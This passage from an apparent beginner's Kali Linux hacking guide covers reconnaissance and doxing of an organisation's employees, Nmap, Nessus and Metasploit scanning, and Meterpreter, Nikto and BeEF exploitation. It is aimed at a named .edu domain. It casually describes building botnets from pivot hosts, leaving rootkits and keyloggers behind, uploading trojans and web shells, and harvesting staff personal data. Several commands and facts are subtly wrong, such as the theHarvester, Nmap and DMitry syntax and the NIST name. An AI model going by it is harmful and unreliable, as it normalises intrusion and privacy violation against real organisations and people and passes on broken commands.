The Harvester is a popular tool in the Kali Linux arsenal that can be used to build and verify a list of email addresses. This tool builds the list of email addresses that may belong to users of the target organization. It will also go the extra step to verify that the addresses exist and confirm that they are valid.
The Harvester tool is a simple penetration testing tool developed using the Python language by Christian Martorella. It works by searching public sources to find crucial organizational and network information on popular search engines including Google and Bing, social networks such as LinkedIn, as well as PGP key servers and other services to find such information as: email addresses, IP addresses, virtual hosts, employee names, hostnames, and sub-domains related to the target organization.
Using the Harvester
Simply launch the script on the Terminal by typing theHarvester:
| |
| --- |
| root@kali:~# theHarvester |
You should see a screen that looks like this:
You can specify the target domain using the -d flag and the -b flag to specify which sources the tool should query. The -f flag is placed on the command to save the results to file. For instance, if your target is an organization called the code academy with a website thecodeacademy.edu, you would enter a command like this on your Kali Linux Terminal:
| |
| --- |
| root@kali:~# thecodeacademy -d thecodeacademy.edu -b -f recondata |
Alternatively, you can enter a command in the format theHarvester -d [url] -l 300 -b [search engine name] to carry out recon on a specific site. Your code would look like this:
| |
| --- |
| root@kali:~# theHarvester -d thecodeacademy.edu -l 300 -b google |
Still using theHarvester, you can search for all information about the target website or organization across all the search engines and services using the keyword all. Your command will take this form:
| |
| --- |
| root@kali:~# theHarvester -d thecodeacademy.edu -l all 300 -b all |
Remember that informatino uncovered must be saved for analysis and comparison. To save the results in an HTML file, simply append the -f option followed by the desired name of the html file, in our case, recondata.html.
## 4.2 Googling, doxing, and using Metagoofil to build a target list
Every experienced hacker will tell you that the best place to begin collecting information about a target, is its own website. The homepage of an organizational website typically provide vast information that can be used to build a profile -- from the displayed organizational charts and administrators’ profiles to contact information and even website navigation map.
The Metagoofil tool has been praised as one of the ‘coolest’ tools in the Kali Linux Hacking toolbox that is used to find documents about the target organization, on its domain or elsewhere. The metadata extracted from the documents can then be used during the scanning and exploitation of the organization’s system or network.
When used with the doxing process, Metagoofil can be used to gather and verify employee names, email addresses, their job titles, departments, interests, and usernames. It is best to store such information on a spreadsheet to make it easy to track, filter, and edit. You can set up Google Spreadsheet, LibreOffice, MS Excel, or WPS Spreadsheets on Kali Linux for this.
Doxing (from dox, an abbreviation of document) is a web-based process of researching identifiable or private information about an individual or an organization. Some of the site to dox are:
Pipl: This is a perfect place to begin if you have only usernames or a username. It is an online service can be used to make the connections between usernames and email addresses. Other sites that do the same thing are knowem.com and spokeo.com.
LinkedIn: This is a very popular social media platform targeting professionals. It is a great place to begin harvesting information about an organization or its employees. Once you find such information as emails or employee names of the target organization, you can find more information about them and their responsibilities using the search query:
| |
| --- |
| site:linkedin.com inurl:pub “at <organisation name>" |
This search will return the profiles of individuals who work at the organization you specify and have online public profiles. You will then be able to confirm the data and people on your list if they still work at the organization.
Social Media: Facebook, Instagram, and Twitter are gold mines of information for hackers harvesting personal information about employees of an organization. Most people sign up for personal social media accounts using their professional email addresses, and they typically never bother to check the privacy settings of such information. Doxing on social media is more efficient when searching for organization’s name against the names, addresses, job titles, and usernames of the target individuals.
Using Metagoofil
You should know that there are many reports of Metagoofil being a bit flaky, but many reviewers agree that it is a very efficient tool to extract useful information and data hidden on common files, especially MS Word documents. To find such information on a .doc file, use the following command:
| |
| --- |
| root@kali:~# metagoofil -d doc -l 500 -n 50 -o /root/ -f /root/results.html |
This query would give a result that looks like this:
| |
| --- |
| root@kali:~# metagoofil -d doc -l 500 -n 50 -o /root/ -f /root/results.html [+] List of users found: -------------------------- Mariah Brown C. Renee Smith Rael Johnson B. Kenny Powell Mark Pinger eliza_Macdonald [+] List of software found: ----------------------------- Microsoft Word 10.0 Microsoft Office Word Microsoft Office Word 2016 Microsoft Office Word 2010 [+] List of paths and servers found: --------------------------------------- '' Normal.dot Normal.docx Normal.dotm [+] List of e-mails found: |
In our demonstration here, we used Metagoofil to scan for document files and extract any user information from the files recovered. As you can see, this tool includes such data as the versions of Microsoft Office files found and scanned.
The flags define the directories to scan, the range of data to look for, and where to save the results when the process is done.
## 4.3 Gathering information with DMitry (Deepmagic information gathering tool)
The DMitry information gathering tool that comes included with Kali Linux was written by James Greig using the C language. This tool has the ability to gather a lot of information about a target host in a short time. The base functionality of this tool is to gather all the possible email addresses, subdomains, uptime and system information, TCP port scans, whois lookups, among others. You can read the list of all its capabilities on this link: http://mor-pah.net/software/dmitry-deepmagic-information-gathering-tool/
Using the DMitry
If installed, you can initiate this tool from the Kali Linux Terminal by typing dmitry.
| |
| --- |
| root@kali:~# dmitry Deepmagic Information Gathering Tool "There be some deep magic going on" Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host -e Performs a search for possible email addresses -i Performs a whois lookup on the IP address of a host -o Saves output to %host.txt or to file specified by -o file -s Performs a search for possible subdomains -n Retrieves Netcraft.com information on a host -p Performs a TCP port scan on a host -w Perform a whois lookup on the domain name of a host \* -f Performs a TCP port scan on a host showing output reporting filtered ports \* -b Reads in the banner received from the scanned port \* -t 0-9 Set the TTL in seconds when scanning a TCP port (Default 2) \*Requires the -p flagged to be passed |
For instance, if your hacking task involves penetrating the defenses of thecodeacademy.edu’s systems, here is how you can use DMitry to scour the internet for information about the company:
| |
| --- |
| root@kali:~# dmitry winsepo dmitrythecodeacademy.txt thecodeacademy.edu |
This command will conduct the IP and domain whois lookup (wi) then retrieve information about the target from Netcraft (n), search subdomain information (s), search for email addresses (e), carry out a TCP port scan (p), then save the data collected in a text file called dmitrythecodeacademy.
## 4.4 Other notable information Gathering Tools in Kali Linux
There are many other great information gathering tools available on Kali Linux that you should check out and play around with. The most notable worthy of honorable mentions in this chapter are:
Recon-ng:
Recon-ng is a fully-featured web-based recon framework developed on the Python platforms, which gives it its powerful data collection and analysis features. This is also the reason why this tool is very fast and effective when used on an open-source environment web-based reconnaissance.
Note that to get the most out of the Recon-ng, you will need to register for API keys for sites such as Twitter, Google, LinkedIn, and Shodan then add them to the tool’s configuration database.
Maltego:
The developer describes Maltego as a tool that uses a unique approach to aggregate information about network and resource based entities posted all over the internet. You can use this tool to all kinds of information from the current configurations of a router to the present whereabouts of the target organization’s information security manager. Maltego can be used to locate, aggregate, and visualize a wide range of information. To use this tool for free, you will be required to create a free account at Paterva.
## 4.5 Summary
There are hundreds of tools available for use in information gathering on the Kali platform; you are advised to explore this wide range, discovering what gives each of the hundreds of tools an edge over the others and what its drawbacks are. With time, you will discover that different tools are ideal for different reconnaissance projects. In most cases, you will be forced to use more than one technique or tools to gather sufficient information to move on to the scanning or penetration phases.
# 5. Phase 2: Scanning with Kali Linux Tools
Once you are done with the reconnaissance phase of penetration test hacking, the scanning phase comes next. Here, you will use the information collected in the previous phase such as information about employees, IP addresses, information system structure, and the physical and logical information about the system of the target organization.
You can also return to the previous Renaissance phase as needed to refine the information you collected or try other recon tactics whenever there is a development in the scanning phase.
As an ethical hacker, you will need to take the scanning phase very seriously and pay attention to the smallest details. The tools that Kali Linux provide to scan the target network will report refined information such as live hosts, node types (such as laptops, servers, printers, desktops, or storage devices), operating system types, and the types of services offered in the system such as web applications, FTP, and remote desktop among others.
If you choose the right one from the tens of scanning tools that come bundled with Kali Linux, you may even be able to uncover obvious vulnerabilities that you can exploit at this stage. These vulnerabilities that are discovered in the early stages of penetration testing life cycle are typically referred to as “low hanging fruits”.
If you have played around with the tools installed with Kali Linux platform, you have probably noticed that there are over fifty tools that you can use to scan a computer or network system. In this phase, we will focus on a few of the best and most effective including Nmap (and ZenMAP), Nessus, and Metasploit.
At the end of this chapter, you should be able to use these and other tools to acquire listings of possible targets for the exploitation phase of penetration test life cycle.
## 5.1 NMAP
NMAP is one of the most useful and popular Kali Linux tools that hackers use to scan the network of a target organization during penetration testing. While this tool is a lot similar to ZenMAP, NMAP uses the command line interface while the later features a graphical user interface. In this section, we will look at how you can use the NMAP free utility to scan and discover networks and to use the scan results to audit the security of the target networks.
Many network and systems administrators use NMAP for other tasks such as carrying out network inventory, monitoring host and service up times, and managing service upgrade schedules.
Here is how the NMAP tool works:
It uses raw IP packets to determine which hosts are live on the target network, what services (including application name and version) they offer, and which operating systems (including versoins) the hosts are running. In some cases, the tool may also uncover the type of firewalls or packet filters in use on the network system.
The steps below demonstrate how to scan a target network using NMAP.
Step 1: On your Kali Linux platform, navigate to Applications -> 01 - Information Gathering - > NMAP.
Step 2: The first thing we will do is to detect the type and version of operating system that the target host runs. To get this information, we will use the variable “-O” indicated on the NMAP to ask it to return the OS type and version. You can read more about this by going to NMAP’s official support page https://nmap.org/book/man-os-detection.html.
Use the following command:
| |
| --- |
| nmap -O 192.168.1.101 |
If you would rather use the graphical user interface of ZenMAP, you will enter the target IP address on the text box labeled “Target:” and the command above in the text box labeled “Command:”.
Your window should look like this:
As you can see in our results screenshot, NMAP has returned a long list of available ports (under Nmap Output) as well as the MAC address, device type, and the type and version of operating system the network device is running. Note that these results may not be accurate 100% of the time.
Step 3: Next, still on NMAP, scan and open the TCP ports of the target network using the following command:
| |
| --- |
| nmap -p -65535 -T4 192.168.1.101 |
The command above will scan all the TCP ports because we have used the “-p” parameter, which is a flag to instruct the NMAP tool to scan all the TCP ports. The “-T4” flag is the defined speed at which NMAP will scan the target network system.
When you run the scan using NMAP, you will find the results showing a list of open ports shown in green and the closed ports shown in red. In the newer versions of NMAP, the closed TCP ports will not be shown when the list is too long.
Step 4: If you wish to scan open UDP ports in the target system using NMAP, you can use the parameter -sU. For instance, to scan for open ports 123, 161, and 162, you can use the following command:
| |
| --- |
| nmap -sU -p 123,161,162 192.168.1.101 |
Note that because NMAP has no way of confirming SY-ACK or any other packet as it does with TCP, scanning open UDP ports is often problematic and results in many false positives.
## 5.2 Nessus
Tenable, one of the most highly respected names in the information security community, is the company behind behind NESSUS. This is an amazingly powerful and easy to use vulnerability scanning tool used by hackers and computer network and information security professionals worldwide.
There are two versions of the NESSUS application, each offering different levels of support and functionality: The NESSUS home version and the NESSUS Professional that you have to pay for to use. Because we are still in the learning stage of using this tool, we will use the Home version with limited (but sufficient) features.
NESSUS is a penetration testing scanner par excellence that brings lots of capabilities you can use to:
* Access configuration and compliance audits.
* Scan web and network applications.
* Check for default credentials.
* Correlate a vulnerability found with an available exploit (It includes cross referencing D2 exploitation packs, ExploitDB, Core IMPACT, Metasploit, and Immunity CANVAS vulnerabilities).
* Identify vulnerabilities in local and remote target networks and filtering them by exploit.
* Identify low severity vulnerabilities to allow admin-level and allow re-casting as critical vulnerabilities to empower you to review low severity findings with potentially serious exposures.
Downloading, installing, and configuring NESSUS
Before you can download and use NESSUS, make sure that your Kali Linux installation is up to date using the command:
| |
| --- |
| apt update && apt upgrade |
Step 1: To be able to download and use Nessus, you must get a a Nessus Activation Code directly from Tenable or via one of their authorized resellers. Simply go to https://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-codeand select ‘Register Now’ Nessus Home (Free). The code will be sent to your email address.
Step 2: Download Nessus for your operating system. Be sure you know whether your version of Kali is 32 or 64 bit to download the right version. The version detail will always be included in the package name.
Step 3: Install Nessus using the command:
| |
| --- |
| dpkg -i Nessus-6.10.4-debian6_amd64.deb |
In this specific case, the name of the package we downloaded is Nessus-6.10.2-debian6_amd64.deb. The package name may be different in your case depending on the current Nessus version. If you download the 32 bit version, for instance, your code would look like this:
| |
| --- |
| dpkg -i Nessus-6.10.4-debian6_i386.deb |
The installation process will look like this:
Wait for installation to complete.
Step 4: Start the Nessus service using the command:
| |
| --- |
| /etc/init.d/nessusd start |
Step 5: When the Nessus service starts, open your browser and navigate to this address: https://localhost:8834/
You will probably encounter a security warning that the connection is not secure because the SSL certificate is not properly configured. Ignore this warning and proceed past it. A wizard to configure your installation will load on the browser page that allows you to create an administrator account, which you activate using the code you received in step 1. Nessus will then connect to the Tenable Support Portal to download and process the required plugins.
Using Nessus to Scan for vulnerabilities
The tools that come pre-loaded with your Kali Linux hacking platform complement the Nessus tool in many ways, making a range of services easily accessible and to use. With time, you will discover that Nessus is a powerful tool that you can use for host discovery, vulnerability testing, and even determining the exploitability of a system.
When Nessus is properly set up and you are ready to begin scanning a target network or system, you should see a screen like this:
Step 1: Click on New Scan to open a new screen with more options to refine the scan depending on the type of vulnerability scanning you want to execute. If you are a beginner, start by choosing the Basic Network Scan option.
Step 2: A new screen asking for the name of the scan and the targets to scan will open. It looks like the screenshot below:
Give your scan an appropriate name and list the target IP address in the network you wish to scan. Save the configuration.
Step 3: In the next screen, click on the Launch button to begin the vulnerability scanning process and wait for it to complete.
Step 4: When the scanning process is complete, Nessus will list the hosts of each IP address scanned and the vulnerability risks associated with each. These risks are color coded, the burnt orange colors being the most critical.
Step 5: On the top-line menu, click on Vulnerabilities to view all the vulnerabilities found on a specific network. You will then be able to select an individual vulnerability and view more details on it on CodeMeter. It should look like this:
Step 6: Finally, you can choose to discard any results that may not be useful to your hack and save those that you will need for exploitation. To save scan results on Nessus, click on the Export tab to reveal a drop down menu with the different formats you can export the results including Nessus, PDF, HTML, CSV, and Nessus DB.
Nessus has grown to become the de facto vulnerability scanner that information security and computing systems professionals use. When properly used, Nessus can find a myriad of vulnerabilities in a network system that you can further investigate or immediately use to test the vulnerability of the target network.
However, just like any other vulnerability scanner, Nessus can report false positives. Once you have the results of a scan, you will need to test each of them to determine whether it is a viable vulnerability or not. You can do this before saving and exporting the scan results or later in the exploitation phase.
## 5.3 Metasploit
Metasploit Framework (MSF) is not a single tool like Nessus or NMAP; it is a collection of hundreds of open source tools put together in Ruby. Like Nessus, it is one of the most popular tools used by both whitehat and blackhat hackers to scan for and find vulnerabilities in a target network, website, or computer operating system. For as far as we refer to Nessus as the de factor vulnerability scanner, we can refer Metasploit to as as the de facto exploit development platform.
Seasoned hackers and information security professionals typically have a MSF system they have built to their specifications such that they can utilize it for their custom needs at any time.
Features of Metasploit
* As stated above, Metasploit is a collection of hundreds of tools a hacker will find invaluable. They can be used to break into local and remote systems.
* Metasploit comes loaded with over 1500 exploits and 430 payloads.
* It allows you to create and configure listeners and payloads and to launch exploits with ease.
* If you are conversant with the Ruby programming language, you can also write your own exploits or modify existing exploits in Metasploit to do exactly what you want.
The tools within the Metasploit Framework that include fuzzing tools, shellcodes, payloads, encoders, and exploits among others can run on or exploit a range of operating systems including Windows, iOS, Mac, and Android. They also come in a variety of interfaces including:
Metasploit Community Web Interface – This is the web based interface provided by rapid7 for easy pentesting using a browser..
Armitag – This is a graphical tool written in java to manage pentest performed with Metasploit.
msfgui - This is the default Metasploit Framework graphical user interface.
msfconsole - This is an interactive shell that can perform a range of tasks.
msfcli - msfcli calls Metasploit Framework functions from the command line or Terminal.
CobaltStrike - This is another graphical user interface that offers added features for post-exploitation steps such as reporting.
Using Metasploit to scan for vulnerabilities
Most servers typically have an open ftp port that a hacker can scan and find to use as a vulnerability to get into the system. For this demonstration, we are going to scan and find this port, after which we can later use bruteforce or dictionary method to exploit it. We are going to use the Msfconsole that comes pre-installed with Kali Linux.
Step 1: Start prerequisite services.
Before you can start using Metasploit on Kali Linux, you will first need to start and enable the postgresql service. Use this command to start the service on the Terminal:
| |
| --- |
| service postgresql start |
After starting the postgresql service enable it using the command:
| |
| --- |
| update-rc.d postgresql enable |
Next, check your IP address. You can do that using this command:
| |
| --- |
| ip a | grep inet |
When you are done with these steps, start Metasploit service using this command:
| |
| --- |
| service metasploit start |
Finally, start msfconsole using this command:
| |
| --- |
| msfconsole |
Step 2: The initial steps
The next step will be to check whether there is a database connected to the framework. Metasploit typically connects to a database when properly initiated, but you must check anyway before proceeding. Use this command:
| |
| --- |
| db_status |
If there is no database connection, you will need to open a new terminal and start the service then use the command below to initiate one:
| |
| --- |
| db_connect msf3:msf3@localhost/msf3 |
Be sure to check and ensure that the database is properly connected to the framework again using the db_status command before you proceed.
Step 3: Find the IP address of the target server
First, we need to find the IP address of the server we are going to scan to find the open ftp port. The easiest way to achieve this is to run NMAP independently or inside Msfconsole. You do not need to start another terminal window, simply type these commands within the Msfconsole to proceed:
| |
| --- |
| msf > nmap -F thecodeacademy.edu |
Remember to replace thecodeacademy.edu with the domain name of the target server. Let the service complete the scan to see the available and open ports if there are any. NMAP should present the port number (e.g. 21/tcp), the state (open), as well as the service type supported by the port (e.g. ftp or ssh).
Using Metasploit to scan for vulnerabilities in a system is easy and there are hundreds of tools to use. It would take forever if we were to detail each of them here. The important point is for you to understand how Metasploit works such that when you start practicing how to use the many services it offers, you can easily refer to the demonstration to store your results in the database for use during the exploitation phase we will cover in the next chapter.
# 6. Phase 3: Exploitation
The National Institute of Science and Technology defines a vulnerability as a weakness in an information system. Internal controls, system security procedures or their implementation that can be exploited to gain access into the system.
However, when discussing exploitation in reference to hacking, this definition is too broad and requires further definition. We can therefore define a vulnerability as an error that can exist in in multiple places in an information system or committed by humans with access to the system that allows a threat into the computer system.
Vulnerabilities in an information system such as a computer or a computer network may lay dormant in unchecked and poorly coded software, inside or outside the network system, or are generated through improper security controls. Proper and thorough reconnaissance and system scanning is aimed at uncovering these weaknesses in the system for exploitation.
We can define exploitation as using such a found weakness to leverage access into an information system or rendering it useless via acts such as denial of service. Because there are typically many possible weaknesses in a complex information system, as a hacker, you will typically try one found vulnerability but if it does not provide access to the system, you will move on to the next or try a different approach to gain access. Remember that there are always more than one vulnerabilities to look for, and there are multiple possible exploitation techniques and tools to try.
Exploitation is by far the hardest and most coveted skills in pentesting. Hacking takes time, knowledge, and persistence just to learn a few of the possible attack types for just one attack vector. Before we can look at some of the most popular and powerful hacking tools that we can use for exploitation on Kali Linux, first let us look at the different attack vectors and attack types.
## 6.1 Attack Vectors and Attack Types
Most people make the mistake of assuming the term attack vector and is synonymous with attack type, and that they can be used interchangeably; however, it is important to know that exploits are classified and their terms used appropriately, especially for proper reporting of the results.
In regard to hacking, attack vector refers to the generic category for classifying a group or subset of attack types within a category. Here is a general summation of the common exploitation attacks grouped into appropriate vectors:
| | |
| --- | --- |
| Attack Vector | Attack Types |
| Code Injection | Buffer Overflow Buffer Underrun Viruses Malware |
| Web Based | Defacement Cross-Site Scripting (XSS) Cross-Site Request Forgery (CSRF) SQL Injection |
| Network Based | Denial of Service (DoS) Distributed Denial of Service (DoS) Password and Sensitive Data Interception Stealing or Counterfeiting Credentials |
| Social Engineering | Impersonation Phishing Spear Phishing Intelligence Gathering |
Exploitation attack vectors and types
When you understand the vector and type of attack, you will have the proper foundation to choose the right tool for exploitation. Most exploitation tools provided on the Kali Linux platform specify which vectors and types of attacks they can perform and it will be easier for you to research online to find the specific tools and tactics that other hackers have successfully used for such a vulnerability.
Without understanding the where, how, and when to apply any of the hundreds of tools that come with Kali Linux, as a hacker, you will be throwing darts in the dark. This categorization will help reduce the effort, time, and required research when moving on to exploitation from reconnaissance and scanning.
## 6.2 Exploiting Vulnerabilities with Metasploit
A wise learner will have, by this point in the book, ventured out and even created accounts with popular hacker and programmer hangouts on the internet. By this, I refer to learning sites such as stackoverflow and /r/hacking/ or /r/HowToHack/on reddit. These are great places to interract with other learners and get free hacking tips and guides from real people.
I will safely assume that you have also played around with other popular recon and scanning tools such as Netdiscover, Cisco-Torch, Sparta, and others. Masscan can scan the whole internet and evel let you watch free live street webcams all over the world!
Going on, we will find out how to use Metasploit to exploit the vulnerabilities we have found in the sites we scanned in the previous chapter.
Be warned that exploiting a vulnerability in a system is a very sensitive affair, and people have gone to jail after being caught messing around other people’s servers without permission.
However, considering that setting up servers can be time consuming and expensive, you can use free online services such as Hack A Server which offer you vulnerable machines (especially Metaspoliable, very popular because it is metasploit-ready) to practice your mad hacking skills on. It looks like this:
Remember that while on these sites, use a private VPN so as not to get reverse hacked by the blackhats prowling the dark corners of the internet.
Accessing Metasploit
If you have played around with Metasploit, you have probably discovered that there are many ways you can access this tool. Until you have enough expenrience with how the tool actually works and grasp all the command keywords, you can use the graphical user interface (GUI). You can open it by going to:
Applications - Kali - Exploitation - Metasploit - Metasploit Community/Pro
You can also use the browser interface by going to:
https://localhost:3790/
Note that because Metasploit does not have a valid security certificate, the browser may warn you that the connection is untrusted. Proceed to click “I Understand the Risks” then choose “Add Exception” and confirm to continue.
You must also set up a username and password as well as other optional parameters that are used by the reporting features of the Metasploit tool during the initial run. When done, click on “Create Account” button to proceed.
Shut down and Restart
During use, Metasploit may need to be restarted to because it can at times be very resource intensive. At times, shutting down and restarting the service is the only way to solve some network connectivity issues. When this happens, you can issue stop or restart commands:
| |
| --- |
| service metasploit restart service metasploit stop service metasploit status |
Restarting, Stopping, and starting Metasploit.
Updating database
Metasploit is developed by Rapid7 but the community users are allowed to add updates to all aspects of the tool. Therefore, it is recommended that you update the database before every use session. The command is:
| |
| --- |
| msfupdate |
If you choose to use the web interface, you can update the Metasploit tool by clicking on “Software Updates” > “Check for Updates” on the top right corner of the web page. Metasploit will download and install all available updates immediately then restart the service. The login screen of the graphical interface looks like this:
The Mission landing page
A successful login on Metasploit will take you to the “Mission” landing page where you can access current and past projects, mission folders and scan results and vulnerability results from current targets. It is a good idea to use the default project folder to make it easy to transition to advanced functions in the future and to be able to import scan results from other tools such as Nessus and NMAP.
Open the scan results we saved in the previous chapter or begin a new scan on a host or network by clicking on the “Scan” button on the Discovery section. You will be prompted to enter target settings and search parameters just as you would when scanning with NMAP or Nessus.
You can access “Advanced Target Settings” when you click “Show Advanced Options”. Here you can access advanced but important parameters and fine-tune the scan session.
1. Excluded Addresses: IP addresses to exclude from the scan.
2. Perform Initial Portscan: Check for the initial deep scan. Leave unchecked in subsequent scans.
3. Custom NMAP Arguments: Access ID evasion and obscure port settings. You can specify individual switches here.
4. Additional TCP Ports: Metasploit targets common ports to optimize the scan. Add any custom ports you discovered during the reconnaissance phase here without switches.
5. Exclude TCP Ports: Enter TCP ports to exclude during the scan.
6. Custom TCP Port Range: Specify minimum and maximum port ranges using hyphens (-).
7. Custom TCP Source Port: Bypass security controls by disguising your source port.
On the “Analysis” tab on the Metasploit mission page, you can view all the results of previous scans along with a brief summary about the scan.
For more information about a target or scan result, click on the host IP address. You will access in-depth data such as this list of ports:
Under the “Overview” tab, you will see the number of hosts scanned, the services it runs, and vulnerabilities found. You can view an analysis of the results including all scanned hosts and a description of the services.
## 6.3 Launching an attack
Click on the “Launch” hyper-link next to the name of a vulnerability found during a scan. The window will transition to a page that describes the vulnerability in detail and automatically fills the data required to complete the execution of the vulnerability exploit. Metasploit will attempt to use a Meterpreter shellcode and a generic payload during execution. Click on the “Run Module” button to apply settings and launch the attack.
A successful exploit means that the host has been compromised and specified actions executed. For instance, in this demonstration, a session has been successfully created on the host.
If your exploit was not successful, you can try another vulnerability or restart the scan with different vulnerabilities. You can see which exploits are available for the results of a scan session under the Meterpreter shell.
## 6.4 Shell Management with Meterpreter
Under the Sessions tab of the Metasploit community platform, you can access vital session details for the current and past exploits. You can interact with hacked systems by performing actions inside the session. Note that all events inside the session are logged for continuity purposes. This information will come in handy when the system is generating a report about the hack.
Here is a brief definition of the various actions you can execute during a hack session.
1. Collect System Data
If a successful hack means grabbing sensitive data such as screenshots, passwords, and system information, this button is it. Taking screenshots is a very powerful way to prove to a client that you successfully breached the honeypot.
Hacks that take advantage of vulnerabilities to provide access to the system root or the administrator account of a domain will typically involve pulling system information that you can analyze and use later to maintain access.
2. Access File system
File management includes accessing the remote system and uploading, downloading, modifying, and deleting files. There are tons of ready-to-use scripts including keyloggers, Trojans, backdoors, and C99 shells that you can upload to the hacked systems to spill out the server’s guts.
3. Command Shell
If you already are an advanced hacker and can get a lot done faster with the command shell, you will find it under the session’s advanced tools. You may not be able to use an administrative or root account during exploitation but you can interact with the remote command shell to plunder the host server.
Until you are proficient with the many Metasploit commands, do not poke around a live server using the command line, not even the test servers. Familiarize yourself with the shell first and gradually go deeper into the system as you practice the commands.
4. Create Proxy Pivot
You can launch other attacks using the current host as the gateway. Have more of these and you can create your own botnet.
5. Create VPN Pivot
You can pivot traffic through a compromised remote host using this shortcut. All the traffic can be routed via an encrypted VPN tunnel.
6. Terminate Session
Stop the exploit session and remove the Meterpreter shell. Most hackers leave rootkits, keyloggers, and configuration files in the system for future exploitation.
## 6.5 Web Server and Application Exploitation
One thing you will catch on very fast as a hacker is that software is software, and no matter what form it comes in, whether it is an offline installation that runs on a server or a wen script packaged as a browser code, it will always have vulnerabilities.
With public-facing web services, there are simply more code injection points accessible over the internet such that anyone can attempt to gain entry onto a network or a computer system to gain control of a service, a system, or to steal data and deface the website. Simply patching the operating system is not enough. Unless the services running on a server are secure, it is difficult to maintain the efficient operation of a server.
2017 Most Exploited Web Vulnerabilities according to OWASP
OWASP is an acronym for Open Web Application Security Project, a non-profit organization that is focused on improving the security of web-based application software. Every year, OWASP releases a listing of the top 10 most common vulnerabilities on the internet. In 2017, the most exploited vulnerabilities on the web were:
1. SQL, OS, XXE, and LDAP Injections
This involves tricking the interpreter by sending it malicious data disguised as a part of the system query or command. The interpreter will then execute the command or access data without the required authorization.
2. Broken Authentication and Session Management
When application functions that deal with session management and authentication are improperly implemented, a hacker can compromise the session tokens, keys, or passwords to exploit other flaws to temporarily or permanently assume a legitimate user’s identity.
3. Cross-Site Scripting (XSS)
XSS is the execution of scripts on a target host browser which may result in the hijack of user sessions, deface websites, or redirect the user to a different website. It can be applied by exploiting a vulnerability in the browser JavaScript API.
4. Broken Access Control
Access control involves a strict enforcement of user authentication. In some cases, flaws in access control structures can be used to gain access to authorized functionality or data including sensitive files, user accounts, and security configuration files.
5. Security Misconfiguration
Proper security involves having a secure configuration deployed for an application server, web server, database server, or web application. Improper configuration and maintenance of these settings leaves the system vulnerable to unauthorized access.
6. Sensitive Data Exposure
Many APIs and web application do not adequately protect sensitive data such as financial and healthcare information. You have heard of cases were hackers steal or modify such weakly protected data or encrypt such data then demand a ransom to decrypt them.
7. Insufficient Attack Protection.
Most applications on the internet are not designed to prevent, detect, or respond to manual and automated attacks.As you gain hacking experience, you will discover that many developers only equip web apps with basic input validation and authentication only.
8. Cross-Site Request Forgery (CSRF).
A CSRF attack involves forcing a browser that is logged in on the target host computer to send a fake HTTP request, often including the victim’s session cookies and other authentication, to a vulnerable web application to appear like a legitimate request.
9. Using Components with Known Vulnerabilities
Components that run with the same privileges as the application e.g. Libraries, software modules, and frameworks can be exploited to facilitate a server takeover. APIS using components with known vulnerabilities are the most susceptible to exploit attacks.
10. Underprotected APIs
APIS such as JavaScript in mobile and computer browser (e.g. REST/JSON, SOAP/XML, GWT, or RPC) are often unprotected despite having numerous known vulnerabilities. Hackers have been leveraging these cracks in the system to attack servers and websites.
You can find out more information about these top 10 attacks here: https://www.owasp.org/index.php/Top_10_2017-Top_10.
## 6.6 Exploiting Web Servers with Nikto
Nikto is one of the most popular web pentesting tools you can run on the Kali operating system. It is an open source server scanner tool that comes bundled with Kali Linux. However, if you do not already have it on your computer, you can download it from http://cirt.net/nikto2.
You can use Nikto to scan the web for vulnerabilities such as:
* HTTP server options like TRACE.
* Specific problems on over 270 servers.
* Presence of index files.
* Over 6500 dangerous files/CGIs.
* Over 1250 outdated versions of web servers.
Nikto is not a stealthy tool; it generates thousands of requests fast and can be used to target remote web servers. You can initialize it using the command:
| |
| --- |
| root@kali: ~# nikto |
To run Nikto against a server, you can specify the IP address or the server URL like below:
| |
| --- |
| root@kali: ~# nikto -h www.thecodeacademy.edu |
One of the best things about Nikto, which also makes it one of the most prefered web server security assessment tools is that it can find potential problems and vulnerabilities pretty fast. While practicing scanning for vulnerabilities before exploitation, you can also try using Nikto and save the findings to exploit with a different tool or even exploit results found by other scanners such as Nessus and NMAP using this tool.
Among the top features and capabilities of Nikto that you can implement as exploits are:
* Identify and alter software headers, files, and favicons.
* Guess and test subdomains.
* Fish for content on web servers using the mutation technique.
* Guess and test authorization credentials (including default ids and their passwords).
* Save and replay full requests and responses for future sorting.
* Check for common parking sites.
* Integrate with Metasploit and test only those sites or applications that are exploitable.
You can also use the -Tuning parameter when exploiting a server or web application using Nikto to run only the exploit tests you need and leave out the rest. This will not only save you time and effort but will also return the exact results you expect. The command would then take this format:
| |
| --- |
| root@kali: ~# nikto -host www.thecodeacademy.edu -Tuning 1 |
The available parameters are:
a – Bypass authentication
b – Identify Software
c – Include Remote Source
0 – Upload File
1 – See Interesting File in log
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – XSS/Script/HTML Injection
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Server-wide Remote File Retrieval
8 – Remote Shell / Command Execution
9 – SQL Injection
x – Reverse Tuning Options (include all except specified)
Scanning web servers with Nikto
Running all Nikto scans on target host
You can also run all scans against a target host server prior to exploitation if the previous attempts do not yield any positive exploits. The command to execute this looks like this:
| |
| --- |
| root@kali: ~# nikto -host www.thecodeacademy.edu |
Note that running all scans is very resource-intensive and may take a long time to complete. If you want to run all services against multiple server hosts, you have the option to import scan results from another tool containing a list of targets (one host per line) or pipe out the scan results of Nmap to Nikto for scanning. To import a file with a list of target IP addresses or URLs, replace the hostname (www.thecodeacademy.edu) with the filepath of the host file.
## 6.7 Exploiting a browser vulnerability with BeEF
BeEF, an acronym for Browser Exploitation Framework, is a penetration testing tool that focuses on exploiting vulnerabilities found on a web browser. A hacker may use BeEF to assess the security status of the target environment using a client-side attack vector. Here is a simple demonstration on how to achieve this:
If BeEF is not installed in your version of Kali Linux, you can set up the package using the commands”
| |
| --- |
| root@kali: ~# apt-get update root@kali: ~# apt-get install beef-xss |
To initialize BeEF, use the following command:
| |
| --- |
| root@kali: ~# cd /usr/share/beef-xss root@kali: ~# ./beef |
To launch a client side attack directly against a browser and use it to pivot into the system, navigate to the user interface panel by using the address http://192.168.71.145:3000/ui/panel on the the browser:
When BeEF initializes, open the browser and enter “beef” for both the username and password.
BeEF login page
The getting started page offers the option to use hooked offline or online browsers. The best way to learn to use BeEF is via the simplified demo you can access via this address:
http://192.168.71.145:3000/demos/
